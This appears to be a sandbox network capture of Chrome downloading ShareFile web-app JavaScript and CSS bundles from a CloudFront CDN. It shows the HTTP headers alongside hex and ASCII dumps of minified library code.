                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC2410INData Raw: 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 61 70 70 6c 79 28 65 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7c 7c 5b 5d 3b 76 61 72 20 72 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 22 64
                                                                                                                                                                                                                                                                                Data Ascii: eof e&&(e=[e]),"[object Array]"===Object.prototype.toString.apply(e))return e;if(!t)return e["default"]||[];var r=e[t];return r||(r=e[this.getScriptPartFromCode(t)]),r||(r=e[this.formatLanguageCode(t)]),r||(r=e[this.getLanguagePartFromCode(t)]),r||(r=e["d
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 3d 34 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 30 3d 3d 65 3f 30 3a 31 3d 3d 65 3f 31 3a 32 3d 3d 65 3f 32 3a 65 25 31 30 30 3e 3d 33 26 26 65 25 31 30 30 3c 3d 31 30 3f 33 3a 65 25 31 30 30 3e 3d 31 31 3f 34 3a 35 29 7d 2c 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 3e 3d 32 26 26 65 3c 3d 34 3f 31 3a 32 29 7d 2c 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 25 31 30 3e 3d 32 26 26 65 25 31 30 3c 3d 34 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 38 3a 66
                                                                                                                                                                                                                                                                                Data Ascii: =4&&(e%100<10||e%100>=20)?1:2)},5:function(e){return Number(0==e?0:1==e?1:2==e?2:e%100>=3&&e%100<=10?3:e%100>=11?4:5)},6:function(e){return Number(1==e?0:e>=2&&e<=4?1:2)},7:function(e){return Number(1==e?0:e%10>=2&&e%10<=4&&(e%100<10||e%100>=20)?1:2)},8:f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 6e 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 69 3d 6e 5b 30 5d 2c 6f 3d 6e 5b 31 5d 3b 74 68 69 73 2e 72 65 61 64 28 69 2c 6f 2c 22 72 65 61 64 22 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 61 29 7b 6e 26 26 74 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 22 2e 63 6f 6e 63 61 74 28 72 2c 22 6c 6f 61 64 69 6e 67 20 6e 61 6d 65 73 70 61 63 65 20 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 20 66 6f 72 20 6c 61 6e 67 75 61 67 65 20 22 29 2e 63 6f 6e 63 61 74 28 69 2c 22 20 66 61 69 6c 65 64 22 29 2c 6e 29 2c 21 6e 26 26 61 26 26 74 2e 6c 6f 67 67 65 72 2e 6c 6f 67 28 22 22 2e 63 6f 6e 63 61 74 28 72 2c 22 6c 6f 61 64 65 64 20 6e 61 6d 65 73 70 61 63
                                                                                                                                                                                                                                                                                Data Ascii: ined?arguments[1]:"",n=e.split("|"),i=n[0],o=n[1];this.read(i,o,"read",undefined,undefined,(function(n,a){n&&t.logger.warn("".concat(r,"loading namespace ").concat(o," for language ").concat(i," failed"),n),!n&&a&&t.logger.log("".concat(r,"loaded namespac
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 31 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d
                                                                                                                                                                                                                                                                                Data Ascii: e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,t,r){Object.defineProperty(t,"__esModule",{value:!0});var n=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 34 35 5e 6c 28 65 2c 30 29 3f 28 28 28 74 3c 3c 32 5e 6c 28 65 2c 30 29 29 3c 3c 32 5e 6c 28 65 2c 31 29 29 3c 3c 32 5e 6c 28 65 2c 32 29 29 3c 3c 32 5e 6c 28 65 2c 33 29 3a 30 7d 28 65 2c 74 29 29 7b 63 61 73 65 20 35 31 30 33 3a 72 65 74 75 72 6e 20 55 2b 22 70 72 69 6e 74 2d 22 2b 65 2b 65 3b 63 61 73 65 20 35 37 33 37 3a 63 61 73 65 20 34 32 30 31 3a 63 61 73 65 20 33 31 37 37 3a 63 61 73 65 20 33 34 33 33 3a 63 61 73 65 20 31 36 34 31 3a 63 61 73 65 20 34 34 35 37 3a 63 61 73 65 20 32 39 32 31 3a 63 61 73 65 20 35 35 37 32 3a 63 61 73 65 20 36 33 35 36 3a 63 61 73 65 20 35 38 34 34 3a 63 61 73 65 20 33 31 39 31 3a 63 61 73 65 20 36 36 34 35 3a 63 61 73 65 20 33 30 30 35 3a 63 61 73 65 20
                                                                                                                                                                                                                                                                                Data Ascii: function(e,t){return 45^l(e,0)?(((t<<2^l(e,0))<<2^l(e,1))<<2^l(e,2))<<2^l(e,3):0}(e,t)){case 5103:return U+"print-"+e+e;case 5737:case 4201:case 3177:case 3433:case 1641:case 4457:case 2921:case 5572:case 6356:case 5844:case 3191:case 6645:case 3005:case
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 73 4f 6e 6c 69 6e 65 28 29 7d 63 6c 61 73 73 20 44 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 72 65 76 65 72 74 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 72 65 76 65 72 74 2c 74 68 69 73 2e 73 69 6c 65 6e 74 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 69 6c 65 6e 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 7d 66 75 6e 63 74 69 6f 6e 20 71 28 65 29 7b 6c 65 74 20 74 2c 72 2c 6e 2c 69 3d 21 31 2c 6f 3d 30 2c 61 3d 21 31 3b 63 6f 6e 73 74 20 73 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 65 2c 74 29 3d 3e 7b 72 3d 65 2c 6e 3d 74 7d 29 29 2c 75 3d 28 29 3d 3e 21 52 2e 69 73 46 6f 63 75 73 65 64 28 29 7c 7c 22 61 6c 77 61 79 73 22 21 3d 3d 65 2e
                                                                                                                                                                                                                                                                                Data Ascii: sOnline()}class D{constructor(e){this.revert=null==e?void 0:e.revert,this.silent=null==e?void 0:e.silent}}function T(e){return e instanceof D}function q(e){let t,r,n,i=!1,o=0,a=!1;const s=new Promise(((e,t)=>{r=e,n=t})),u=()=>!R.isFocused()||"always"!==e.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 74 61 6c 65 54 69 6d 65 3d 3d 3d 72 2e 73 74 61 6c 65 54 69 6d 65 7c 7c 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 6c 65 54 69 6d 65 6f 75 74 28 29 3b 63 6f 6e 73 74 20 6f 3d 74 68 69 73 2e 63 6f 6d 70 75 74 65 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 29 3b 21 69 7c 7c 74 68 69 73 2e 63 75 72 72 65 6e 74 51 75 65 72 79 3d 3d 3d 6e 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 64 3d 3d 3d 72 2e 65 6e 61 62 6c 65 64 26 26 6f 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 7c 7c 74 68 69 73 2e 75 70 64 61 74 65 52 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 28 6f 29 7d 67 65 74 4f 70 74 69 6d 69 73 74 69 63 52 65 73 75 6c 74 28 65 29 7b 63 6f 6e 73
                                                                                                                                                                                                                                                                                Data Ascii: &&this.options.staleTime===r.staleTime||this.updateStaleTimeout();const o=this.computeRefetchInterval();!i||this.currentQuery===n&&this.options.enabled===r.enabled&&o===this.currentRefetchInterval||this.updateRefetchInterval(o)}getOptimisticResult(e){cons
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC7402INData Raw: 2e 66 69 6e 64 41 6c 6c 28 6e 29 2e 6d 61 70 28 28 65 3d 3e 65 2e 63 61 6e 63 65 6c 28 69 29 29 29 29 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6f 29 2e 74 68 65 6e 28 73 29 5b 22 63 61 74 63 68 22 5d 28 73 29 7d 69 6e 76 61 6c 69 64 61 74 65 51 75 65 72 69 65 73 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 5b 6e 2c 69 5d 3d 68 28 65 2c 74 2c 72 29 3b 72 65 74 75 72 6e 20 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 3b 69 66 28 74 68 69 73 2e 71 75 65 72 79 43 61 63 68 65 2e 66 69 6e 64 41 6c 6c 28 6e 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 69 6e 76 61 6c 69 64 61 74 65 28 29 7d 29 29 2c 22 6e 6f 6e 65 22 3d 3d 3d 6e 2e 72 65 66 65 74 63 68 54 79 70 65 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f
                                                                                                                                                                                                                                                                                Data Ascii: .findAll(n).map((e=>e.cancel(i)))));return Promise.all(o).then(s)["catch"](s)}invalidateQueries(e,t,r){const[n,i]=h(e,t,r);return F.batch((()=>{var e,t;if(this.queryCache.findAll(n).forEach((e=>{e.invalidate()})),"none"===n.refetchType)return Promise.reso


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                127192.168.2.64985613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC576OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 80657
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 07:00:08 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 08:41:36 GMT
                                                                                                                                                                                                                                                                                ETag: "3efbae3e8929430a8d33717801e9c89c"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 0e75d8f2d484ce463fc04f5c422aa178.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: cJgx21S51Ep4-TiuaATfQcn-HfI-j3N01zOwONvALMvgp-xWFgOrpQ==
                                                                                                                                                                                                                                                                                Age: 33826
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC15852INData Raw: 2e 64 69 61 6c 6f 67 7b 2d 2d 64 69 61 6c 6f 67 2d 62 67 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 2d 64 69 61 6c 6f 67 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 2d 64 69 61 6c 6f 67 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 31 34 70 78 20 30 20 72 67 62 61 28 35 38 2c 35 37 2c 36 38 2c 2e 32 29 3b 2d 2d 74 65 78 74 2d 70 72 69 6d 61 72 79 2d 63 6f 6c 6f 72 3a 23 31 35 31 34 31 61 3b 2d 2d 74 65 78 74 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 3a 23 35 62 35 62 36 36 3b 2d 2d 68 6f 76 65 72 2d 66 69 6c 74 65 72 3a 62 72 69 67 68 74 6e 65 73 73 28 30 2e 39 29 3b 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 23 30 30 36 30 64 66 3b 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 6f 75 74 6c 69 6e 65 3a 32 70 78 20 73 6f 6c 69 64 20 76
                                                                                                                                                                                                                                                                                Data Ascii: .dialog{--dialog-bg-color:#fff;--dialog-border-color:#fff;--dialog-shadow:0 2px 14px 0 rgba(58,57,68,.2);--text-primary-color:#15141a;--text-secondary-color:#5b5b66;--hover-filter:brightness(0.9);--focus-ring-color:#0060df;--focus-ring-outline:2px solid v
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 42 6f 72 64 65 72 29 3e 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 31 30 70 78 20 23 66 66 30 3b 6f 70 61 63 69 74 79 3a 2e 32 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 6c 69 6e 6b 41 6e 6e 6f 74 61 74 69 6f 6e 2e 68 61 73 42 6f 72 64 65 72 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 30 2c 2e 32 29 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 68 61 73 42 6f 72 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 74 65 78 74 41 6e 6e 6f 74 61 74 69 6f 6e 20 69 6d 67 7b 63 75 72
                                                                                                                                                                                                                                                                                Data Ascii: Border)>a:hover{background-color:#ff0;box-shadow:0 2px 10px #ff0;opacity:.2}.annotationLayer .linkAnnotation.hasBorder:hover{background-color:rgba(255,255,0,.2)}.annotationLayer .hasBorder{background-size:100% 100%}.annotationLayer .textAnnotation img{cur
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 2d 2d 74 6f 67 67 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 64 69 73 61 62 6c 65 64 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 64 69 73 61 62 6c 65 64 29 3b 2d 2d 74 6f 67 67 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 29 3b 2d 2d 74 6f 67 67 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 61 63 74 69 76 65 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 63 6f 6c 6f 72 2d 61 63 74 69 76 65 29 3b 2d 2d 74 6f 67 67 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 64 69 73 61 62 6c 65 64 3a
                                                                                                                                                                                                                                                                                Data Ascii: kground-color);--toggle-background-color-disabled:var(--button-background-color-disabled);--toggle-border-color-hover:var(--border-interactive-color-hover);--toggle-border-color-active:var(--border-interactive-color-active);--toggle-border-color-disabled:
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC15340INData Raw: 74 61 74 69 6f 6e 45 64 69 74 6f 72 4c 61 79 65 72 20 2e 69 6e 6b 45 64 69 74 6f 72 2e 65 64 69 74 69 6e 67 7b 63 75 72 73 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 45 64 69 74 6f 72 4c 61 79 65 72 20 2e 69 6e 6b 45 64 69 74 6f 72 20 2e 69 6e 6b 45 64 69 74 6f 72 43 61 6e 76 61 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 69 6e 73 65 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 45 64 69 74 6f 72 4c 61 79 65 72 20 2e 73 74 61 6d 70 45 64 69 74 6f 72 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 3a 69 73 28 2e 61 6e 6e 6f 74 61 74 69 6f 6e 45 64 69 74 6f 72 4c 61 79 65 72
                                                                                                                                                                                                                                                                                Data Ascii: tationEditorLayer .inkEditor.editing{cursor:inherit}.annotationEditorLayer .inkEditor .inkEditorCanvas{height:100%;inset:0;position:absolute;touch-action:none;width:100%}.annotationEditorLayer .stampEditor{height:auto;width:auto}:is(.annotationEditorLayer
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC10001INData Raw: 61 6c 6c 79 2c 2e 64 69 61 6c 6f 67 2e 6e 65 77 41 6c 74 54 65 78 74 2e 6e 6f 41 69 20 23 6e 65 77 41 6c 74 54 65 78 74 43 72 65 61 74 65 41 75 74 6f 6d 61 74 69 63 61 6c 6c 79 2c 2e 64 69 61 6c 6f 67 2e 6e 65 77 41 6c 74 54 65 78 74 2e 6e 6f 41 69 20 23 6e 65 77 41 6c 74 54 65 78 74 44 69 73 63 6c 61 69 6d 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 69 61 6c 6f 67 2e 6e 65 77 41 6c 74 54 65 78 74 2e 61 69 49 6e 73 74 61 6c 6c 69 6e 67 20 23 6e 65 77 41 6c 74 54 65 78 74 44 6f 77 6e 6c 6f 61 64 4d 6f 64 65 6c 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 69 61 6c 6f 67 2e 6e 65 77 41 6c 74 54 65 78 74 2e 65 72 72 6f 72 20 23 6e 65 77 41 6c 74 54 65 78 74 4e 6f 74 4e 6f 77 7b 64 69 73
                                                                                                                                                                                                                                                                                Data Ascii: ally,.dialog.newAltText.noAi #newAltTextCreateAutomatically,.dialog.newAltText.noAi #newAltTextDisclaimer{display:none!important}.dialog.newAltText.aiInstalling #newAltTextDownloadModel{display:flex!important}.dialog.newAltText.error #newAltTextNotNow{dis
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC6696INData Raw: 3a 69 73 28 3a 68 6f 76 65 72 2c 3a 61 63 74 69 76 65 2c 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 3e 2e 73 77 61 74 63 68 7b 6f 75 74 6c 69 6e 65 3a 32 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 68 6f 76 65 72 2d 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 29 7d 23 68 69 67 68 6c 69 67 68 74 50 61 72 61 6d 73 54 6f 6f 6c 62 61 72 43 6f 6e 74 61 69 6e 65 72 20 23 65 64 69 74 6f 72 48 69 67 68 6c 69 67 68 74 54 68 69 63 6b 6e 65 73 73 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 73 74 72 65 74 63 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 34 70 78 7d 3a 69 73 28 23 68 69 67 68 6c 69 67 68 74 50 61 72 61 6d 73 54 6f 6f 6c 62 61 72
                                                                                                                                                                                                                                                                                Data Ascii: :is(:hover,:active,:focus-visible)>.swatch{outline:2px solid var(--hover-outline-color)}#highlightParamsToolbarContainer #editorHighlightThickness{align-items:center;align-self:stretch;display:flex;flex-direction:column;gap:4px}:is(#highlightParamsToolbar


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                128192.168.2.64985413.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC424OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 91744
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "ec10a08abeea396244c7c88ffaa5ecf7"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3bf3e75bcb9a86b3eb343a1d4392a6de.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: h8TNezb2VQ0cTVpZ_k55dhsxPzvyNUU9xFA8zzDB1AehJCNz02iQLg==
                                                                                                                                                                                                                                                                                Age: 45980
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 68 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 72 2e 42 75 74 74 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{})System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button
